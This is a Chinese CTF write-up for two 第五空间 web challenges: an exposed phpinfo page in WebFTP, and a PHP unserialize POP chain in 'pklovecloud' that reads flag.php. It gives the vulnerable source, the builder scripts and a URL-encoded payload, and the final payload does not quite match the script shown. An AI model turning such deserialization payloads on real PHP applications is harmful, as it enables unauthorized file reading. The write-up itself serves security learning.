第五空间WEBFTP pklovecloud

https://github.com/wifeat/WebFTP

github上有源码 上头说到了初始账号和密码

a1.PNG

登不进去
审一审源码

a3.PNG

1
2
然后意外地Readme/mytz.php?act=phpinfo

phpinfo里头就有flag了

a2.png

pklovecloud

源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
<?php  
include 'flag.php';
class pkshow 
{  
    function echo_name()     
    {          
        return "Pk very safe^.^";      
    }  
} 

class acp 
{   
    protected $cinder;  
    public $neutron;
    public $nova;
    function __construct() 
    {      
        $this->cinder = new pkshow;
    }  
    function __toString()      
    {          
        if (isset($this->cinder))  
            return $this->cinder->echo_name();      
    }  
}  

class ace
{    
    public $filename;     
    public $openstack;
    public $docker; 
    function echo_name()      
    {   
        $this->openstack = unserialize($this->docker);
        $this->openstack->neutron = $heat;
        if($this->openstack->neutron === $this->openstack->nova)
        {
        $file = "./{$this->filename}";
            if (file_get_contents($file))         
            {              
                return file_get_contents($file); 
            }  
            else 
            { 
                return "keystone lost~"; 
            }    
        }
    }  
}  

if (isset($_GET['pks']))  
{
    $logData = unserialize($_GET['pks']);
    echo $logData; 
} 
else 
{ 
    highlight_file(__file__); 
}
?>

class ace 这里会反序列化docker但是后面

1
他访问的属性是class acp里面的

说明我们的docker里面得放acp序列化的内容

1
if($this->openstack->neutron === $this->openstack->nova) 判定条件里头说的
那么构造链条
1
2
3
4
5
6
7
8
9
<?php
class acp 
{   
    protected $cinder;  
    public $neutron = 'a';
    public $nova = 'a';
}
$a = new acp();
echo serialize($a);
1
得到:O:3:"acp":3:{s:9:"*cinder";N;s:7:"neutron";s:1:"a";s:4:"nova";s:1:"a";}
1
echo 会触发toString这样在析构方法里面把pkshow换成ace,从而换成ace的echo_name()方法
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
<?php
class ace
{    
    public $filename = 'flag.php';     
    public $openstack;
    public $docker = 'O:3:"acp":3:{s:9:"*cinder";N;s:7:"neutron";s:1:"a";s:4:"nova";s:1:"a";}'; 
}
class acp 
{   
    protected $cinder;  
    public $neutron;
    public $nova;
    function __construct() 
    {      
        $this->cinder = new ace();
    }
}
$a = new acp();
echo urlencode(serialize($a));
1
得到?pks=O%3A3%3A%22acp%22%3A3%3A%7Bs%3A9%3A%22%00%2A%00cinder%22%3BO%3A3%3A%22ace%22%3A3%3A%7Bs%3A8%3A%22filename%22%3Bs%3A8%3A%22flag.php%22%3Bs%3A9%3A%22openstack%22%3BN%3Bs%3A6%3A%22docker%22%3Bs%3A68%3A%22O%3A3%3A%22acp%22%3A3%3A%7Bs%3A9%3A%22%00%2A%00cinder%22%3Bs%3A0%3A%22%22%3Bs%3A7%3A%22neutron%22%3BN%3Bs%3A4%3A%22nova%22%3BR%3A3%3B%7D%22%3B%7Ds%3A7%3A%22neutron%22%3BN%3Bs%3A4%3A%22nova%22%3BR%3A6%3B%7D

查看源码就能拿到flag

a4.png